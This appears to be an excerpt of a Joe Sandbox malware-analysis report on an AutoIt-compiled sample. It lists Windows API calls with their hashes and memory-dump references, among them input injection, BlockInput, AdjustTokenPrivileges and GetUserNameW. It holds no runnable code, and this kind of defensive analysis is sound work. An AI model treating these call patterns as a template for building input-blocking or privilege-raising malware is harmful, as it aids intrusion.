                                                                                                                                        • Opcode ID: 1725947790b02b37390af36b18dcb454e0b5e593dddffc5fd43b3bba02390955
                                                                                                                                        • Instruction ID: ad8001445ee8b1a6215a5b30da605d510c4be5fb9912a69fdf9e6e8c7de12df1
                                                                                                                                        • Opcode Fuzzy Hash: 1725947790b02b37390af36b18dcb454e0b5e593dddffc5fd43b3bba02390955
                                                                                                                                        • Instruction Fuzzy Hash: FCF0F471950309FBDB00EFE4DC89AAEBBBCFB08604F5049A5E501E2191E774AA448B60
                                                                                                                                        APIs
                                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00B7D28C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NameUser
                                                                                                                                        • String ID: X64
                                                                                                                                        • API String ID: 2645101109-893830106
                                                                                                                                        • Opcode ID: 76efa0f106199213679e380cf974c6e14ff2cc35bfcfd0b58a2ab3840650896f
                                                                                                                                        • Instruction ID: ee634224b830b4dce074605121a34bf98f791ff2f8f9cb334518611d3f560f6b
                                                                                                                                        • Opcode Fuzzy Hash: 76efa0f106199213679e380cf974c6e14ff2cc35bfcfd0b58a2ab3840650896f
                                                                                                                                        • Instruction Fuzzy Hash: 5DD0CAB480512DEBCB94DBA0ECC8DDEB7BCBB04345F204292F50AA2000DB7096498F20
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B96918
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00B96961
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                        • Opcode ID: 4070b6b62afd33d033e3e06c5b7c0de8e333adf040a6c9a9350143032e06bcc9
                                                                                                                                        • Instruction ID: 99e1ad7eed6ac3945cae4ec417694071e5ec7c98ba7b4a398123ceaaac890eae
                                                                                                                                        • Opcode Fuzzy Hash: 4070b6b62afd33d033e3e06c5b7c0de8e333adf040a6c9a9350143032e06bcc9
                                                                                                                                        • Instruction Fuzzy Hash: F21193316042109FCB10DF29D484A16BBE5FF89328F14C6A9E4698F6A2CB30EC05CB91
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00BA4891,?,?,00000035,?), ref: 00B937E4
                                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00BA4891,?,?,00000035,?), ref: 00B937F4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3479602957-0
                                                                                                                                        • Opcode ID: 6cc96c68236aa614fd09e10a28040d81938d6fdfa5f492e52ff7603385105b4f
                                                                                                                                        • Instruction ID: 855f70efa21cae6a04656784b38bbe7c7fb3b6f152b2ff43214ebd4921b05678
                                                                                                                                        • Opcode Fuzzy Hash: 6cc96c68236aa614fd09e10a28040d81938d6fdfa5f492e52ff7603385105b4f
                                                                                                                                        • Instruction Fuzzy Hash: 10F0E5B06042286BEB2057A69C4DFEB3EEEEFC4B61F0002B5F509D3291D9A09D44C6B1
                                                                                                                                        APIs
                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00B8B25D
                                                                                                                                        • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00B8B270
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InputSendkeybd_event
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3536248340-0
                                                                                                                                        • Opcode ID: dbca1398d060df2b2b3c60c5c4331884c447bab56832b8f288727804a7e60472
                                                                                                                                        • Instruction ID: 18667a4040eb079b1fea5852739119c3652a740259193e685f950683ffd55d94
                                                                                                                                        • Opcode Fuzzy Hash: dbca1398d060df2b2b3c60c5c4331884c447bab56832b8f288727804a7e60472
                                                                                                                                        • Instruction Fuzzy Hash: 82F01D7180424DABDB15DFA5C806BEE7FB4FF04305F008059F965A61A1C7799611DF94
                                                                                                                                        APIs
                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B811FC), ref: 00B810D4
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00B811FC), ref: 00B810E9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 81990902-0
                                                                                                                                        • Opcode ID: 5abbc35fd3aefc4cd36f59741610bfa37b988ba0dd49214bb6d04f946f6e5570
                                                                                                                                        • Instruction ID: 9924b1defda22a253c9d23548c043d6e376ef4bcf5629701aaf2f3ada9fd59eb
                                                                                                                                        • Opcode Fuzzy Hash: 5abbc35fd3aefc4cd36f59741610bfa37b988ba0dd49214bb6d04f946f6e5570
                                                                                                                                        • Instruction Fuzzy Hash: 8EE04F32408611AFE7256B11FC09E737BE9EB04310F20896DF4A5814B1DBA2AC90DB14
                                                                                                                                        APIs
                                                                                                                                        • BlockInput.USER32(00000001), ref: 00B9EABD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BlockInput
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3456056419-0
                                                                                                                                        • Opcode ID: bc042b697d28d73faff31d197015c4766d81ba48f3003e3135beb8fea4989ca3
                                                                                                                                        • Instruction ID: 7a6a5656072310ac384749cf6ac498a0976b6f5291748020a9331d7765c297f6
                                                                                                                                        • Opcode Fuzzy Hash: bc042b697d28d73faff31d197015c4766d81ba48f3003e3135beb8fea4989ca3
                                                                                                                                        • Instruction Fuzzy Hash: 2DE048312102149FD710DF69D444E9AFBD9EF58760F048466FC49C7361DB70E8418B90
                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00B403EE), ref: 00B409DA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                        • Opcode ID: 28006d56e54640c373b340ba6dddd613767133c6fb43e8b9b5c7d14794d4d6ab
                                                                                                                                        • Instruction ID: ffdfa32a5604200cf114ae2c5cc21182c8aefdd0644766b1967b565eddd868c2
                                                                                                                                        • Opcode Fuzzy Hash: 28006d56e54640c373b340ba6dddd613767133c6fb43e8b9b5c7d14794d4d6ab
                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                        APIs
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00BA2B30
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00BA2B43
                                                                                                                                        • DestroyWindow.USER32 ref: 00BA2B52
                                                                                                                                        • GetDesktopWindow.USER32 ref: 00BA2B6D
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00BA2B74
                                                                                                                                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00BA2CA3
                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00BA2CB1
                                                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA2CF8
                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00BA2D04
                                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00BA2D40
                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA2D62
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA2D75
                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA2D80
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00BA2D89
                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA2D98
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00BA2DA1
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA2DA8
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00BA2DB3
                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA2DC5
                                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00BBFC38,00000000), ref: 00BA2DDB
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00BA2DEB
                                                                                                                                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00BA2E11
                                                                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00BA2E30
                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA2E52
                                                                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA303F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                        • API String ID: 2211948467-2373415609
                                                                                                                                        • Opcode ID: 8e566e33866e7d4261111d61ae6501fac628c6bcfa26b89bc43100dcbf58bef2
                                                                                                                                        • Instruction ID: 9112aebc2df10c61f2628dd7e0b185869e33379446ae150722e1fcc871d37c78
                                                                                                                                        • Opcode Fuzzy Hash: 8e566e33866e7d4261111d61ae6501fac628c6bcfa26b89bc43100dcbf58bef2
                                                                                                                                        • Instruction Fuzzy Hash: 10025A71900215EFDB14DF68DC89EAE7BB9EF49710F048698F915AB2A1DB70ED01CB60
                                                                                                                                        APIs
                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00BB712F
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00BB7160
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00BB716C
                                                                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 00BB7186
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00BB7195
                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00BB71C0
                                                                                                                                        • GetSysColor.USER32(00000010), ref: 00BB71C8
                                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00BB71CF
                                                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 00BB71DE
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00BB71E5
                                                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00BB7230
                                                                                                                                        • FillRect.USER32(?,?,?), ref: 00BB7262
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BB7284
                                                                                                                                          • Part of subcall function 00BB73E8: GetSysColor.USER32(00000012), ref: 00BB7421
                                                                                                                                          • Part of subcall function 00BB73E8: SetTextColor.GDI32(?,?), ref: 00BB7425
                                                                                                                                          • Part of subcall function 00BB73E8: GetSysColorBrush.USER32(0000000F), ref: 00BB743B
                                                                                                                                          • Part of subcall function 00BB73E8: GetSysColor.USER32(0000000F), ref: 00BB7446
                                                                                                                                          • Part of subcall function 00BB73E8: GetSysColor.USER32(00000011), ref: 00BB7463
                                                                                                                                          • Part of subcall function 00BB73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BB7471
                                                                                                                                          • Part of subcall function 00BB73E8: SelectObject.GDI32(?,00000000), ref: 00BB7482
                                                                                                                                          • Part of subcall function 00BB73E8: SetBkColor.GDI32(?,00000000), ref: 00BB748B
                                                                                                                                          • Part of subcall function 00BB73E8: SelectObject.GDI32(?,?), ref: 00BB7498
                                                                                                                                          • Part of subcall function 00BB73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00BB74B7
                                                                                                                                          • Part of subcall function 00BB73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BB74CE
                                                                                                                                          • Part of subcall function 00BB73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00BB74DB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4124339563-0
                                                                                                                                        • Opcode ID: 95657191b38d474eac7fc925b59c5e24ebed0c6bff4946a15eaae0a88d231256
                                                                                                                                        • Instruction ID: 090db5a996a535e308ade3314fde68eee1dec8a8d66fecb3b758fe3cafac555c
                                                                                                                                        • Opcode Fuzzy Hash: 95657191b38d474eac7fc925b59c5e24ebed0c6bff4946a15eaae0a88d231256
                                                                                                                                        • Instruction Fuzzy Hash: 00A17371008701AFD711DF64DC49EAB7BE9FB89320F100B19F9A2A71A1DBB1D945CB61
                                                                                                                                        APIs
                                                                                                                                        • DestroyWindow.USER32(?,?), ref: 00B38E14
                                                                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00B76AC5
                                                                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B76AFE
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B76F43
                                                                                                                                          • Part of subcall function 00B38F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B38BE8,?,00000000,?,?,?,?,00B38BBA,00000000,?), ref: 00B38FC5
                                                                                                                                        • SendMessageW.USER32(?,00001053), ref: 00B76F7F
                                                                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B76F96
                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00B76FAC
                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00B76FB7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 2760611726-4108050209
                                                                                                                                        • Opcode ID: d47e73e1cd93ba85f6f3df818a4d895f6cbab17669915ac6eb9b3a3e68b9f558
                                                                                                                                        • Instruction ID: 51fb93d3d04e9e7affe5a4ad287b20feb5615c9839f0472d263af0f6afaf1f0e
                                                                                                                                        • Opcode Fuzzy Hash: d47e73e1cd93ba85f6f3df818a4d895f6cbab17669915ac6eb9b3a3e68b9f558
                                                                                                                                        • Instruction Fuzzy Hash: 2F128E30204611EFDB25CF28C894BB5BBE5FB55300F2489A9F4A9CB661CB71EC52DB91
                                                                                                                                        APIs
                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 00BA273E
                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00BA286A
                                                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00BA28A9
                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00BA28B9
                                                                                                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00BA2900
                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00BA290C
                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00BA2955
                                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00BA2964
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00BA2974
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00BA2978
                                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00BA2988
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BA2991
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00BA299A
                                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00BA29C6
                                                                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00BA29DD
                                                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00BA2A1D
                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00BA2A31
                                                                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00BA2A42
                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00BA2A77
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00BA2A82
                                                                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00BA2A8D
                                                                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00BA2A97
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                        • API String ID: 2910397461-517079104
                                                                                                                                        • Opcode ID: 8b2c4f215ab4f5ce018ad9296ce5985f1c1f63aa1e682c1b9974b6fe51e961ba
                                                                                                                                        • Instruction ID: 7b079cefd4fde309dafe1ec9dbbcfb52b285d5eb542a9eec5c59945b5d08434e
                                                                                                                                        • Opcode Fuzzy Hash: 8b2c4f215ab4f5ce018ad9296ce5985f1c1f63aa1e682c1b9974b6fe51e961ba
                                                                                                                                        • Instruction Fuzzy Hash: 17B15B71A00215BFEB14DF68DC49FAE7BB9EB09710F004654F915EB2A0DBB4AD40CBA4
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00B94AED
                                                                                                                                        • GetDriveTypeW.KERNEL32(?,00BBCB68,?,\\.\,00BBCC08), ref: 00B94BCA
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00BBCB68,?,\\.\,00BBCC08), ref: 00B94D36
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
